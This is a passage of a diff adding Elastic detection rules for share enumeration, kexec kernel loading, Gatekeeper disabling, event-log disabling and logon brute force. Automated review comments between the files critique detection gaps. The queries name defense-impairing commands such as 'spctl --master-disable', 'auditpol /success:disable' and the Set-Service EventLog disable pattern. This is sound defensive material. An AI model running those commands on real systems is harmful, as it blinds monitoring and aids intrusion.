This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"Invoke-ShareFinder\" or\n \"Invoke-ShareFinderThreaded\" or\n (\n \"shi1_netname\" and\n \"shi1_remark\"\n ) or\n (\n \"NetShareEnum\" and\n \"NetApiBufferFree\"\n )\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://www.advintel.io/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the 
logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 9 + }, + "id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9", + "type": "security-rule" +} \ No newline at end of file 
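Review bot: The `not user.id : "S-1-5-18"` exclusion in `query` drops every script block executed as SYSTEM, which is exactly the context that PsExec-style and service-based lateral movement lands in, so an attacker who has already escalated enumerates shares unseen; if the exclusion exists for management agents, exceptions scoped to those agents' script paths would be safer than a blanket SID filter. Script Block Logging only exposes the `NetShareEnum`/`NetApiBufferFree` and `shi1_*` strings when the script is un-obfuscated at the block level, so the guide's "This activity is unlikely to happen legitimately" should not be read as coverage of T1135 in general. Minor: the `reg add` command in `setup` lacks `/f`, so it prompts for confirmation when the value already exists and will stall an automated rollout; `reg add ... /d 1 /f` avoids that.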
diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6.json new file mode 100644 index 00000000000..ffaaca8c9bd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6.json 
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Load or Unload via Kexec Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"kexec\" and process.args in (\"--exec\", \"-e\", \"--load\", \"-l\", \"--unload\", \"-u\")\n", + "references": [ + "https://www.crowdstrike.com/blog/venom-vulnerability-details/", + "https://www.makeuseof.com/what-is-venom-vulnerability/", + "https://madaidans-insecurities.github.io/guides/linux-hardening.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4d4c35f4-414e-4d0c-bb7e-6db7c80a6957", + "setup": "## Setup\n\nThis 
rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1601", + "name": "Modify System Image", + "reference": "https://attack.mitre.org/techniques/T1601/", + "subtechnique": [ + { + 
"id": "T1601.001", + "name": "Patch System Image", + "reference": "https://attack.mitre.org/techniques/T1601/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106.json new file mode 100644 index 00000000000..be7b0b176f9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106.json 
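Review bot: The `query` only sees an execve of a binary named `kexec`, so a kernel loaded through the `kexec_load`/`kexec_file_load` syscalls directly (a small C program, or a renamed copy of the tool) never matches, even though `auditd_manager` is listed as a data source and could carry those events if a syscall audit rule such as `-a always,exit -F arch=b64 -S kexec_load,kexec_file_load -k kexec` were configured; the `setup` text should say so, and the query would need to accept those syscall events rather than only `process` start events. Separately, the `description` and `references` tie kexec to VM escape and the VENOM QEMU bug and map the rule to T1611 Escape to Host; kexec replaces the guest's own kernel and does not cross the hypervisor boundary, so that mapping reads as unsupported, and the T1547.006 and T1601.001 entries already present describe the behavior. Suggest dropping the "allowing e.g. a VM Escape" clause and the two VENOM links.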
@@ -0,0 +1,81 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to disable Gatekeeper on macOS. Gatekeeper is a security feature that's designed to ensure that only trusted software is run. Adversaries may attempt to disable Gatekeeper before executing malicious code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Disable Gatekeeper", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.args:(spctl and \"--master-disable\")\n", + "references": [ + "https://support.apple.com/en-us/HT202491", + "https://community.carbonblack.com/t5/Threat-Advisories-Documents/TAU-TIN-Shlayer-OSX/ta-p/68397" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4da13d6e-904f-4636-81d8-6ab14b4e6ae9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_111.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_111.json new file mode 100644 index 00000000000..27fbe89f929 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_111.json 
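Review bot: The `"query"` line matches only the literal `--master-disable` argument to spctl, and newer macOS releases appear to have renamed that switch to `--global-disable`; if so, the rule misses the renamed invocation of the same Gatekeeper-disabling action. A wider args match keeps coverage across releases, e.g. `process.args:(spctl and (\"--master-disable\" or \"--global-disable\"))`. The `"index"` line also uses the broad `logs-endpoint.events.*` pattern, whereas the _112 revision of the EventLog rule later in this diff narrows a process-only query to `logs-endpoint.events.process-*`; this query reads only process fields, so the narrower data stream would reduce scanned data without changing results, assuming that stream is populated in the target stack.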
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Ivan Ninichuck", + "Austin Songer" + ], + "description": "Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Event and Security Logs Using Built-in Tools", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n ((process.name:\"logman.exe\" or ?process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\n ((process.name:\"auditpol.exe\" or ?process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n)\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + 
}, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + 
"reference": "https://attack.mitre.org/techniques/T1562/002/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "4de76544-f0e5-486a-8f84-eae0b6063cdc_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_112.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_112.json new file mode 100644 index 00000000000..dd58aa1d86d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_112.json 
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Ivan Ninichuck", + "Austin Songer" + ], + "description": "Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Event and Security Logs Using Built-in Tools", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n ((process.name:\"logman.exe\" or ?process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\n ((process.name:\"auditpol.exe\" or ?process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n)\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + 
}, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + 
"reference": "https://attack.mitre.org/techniques/T1562/002/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "4de76544-f0e5-486a-8f84-eae0b6063cdc_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10.json new file mode 100644 index 00000000000..8e017e793de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10.json 
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Multiple Logon Failure Followed by Logon Success", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
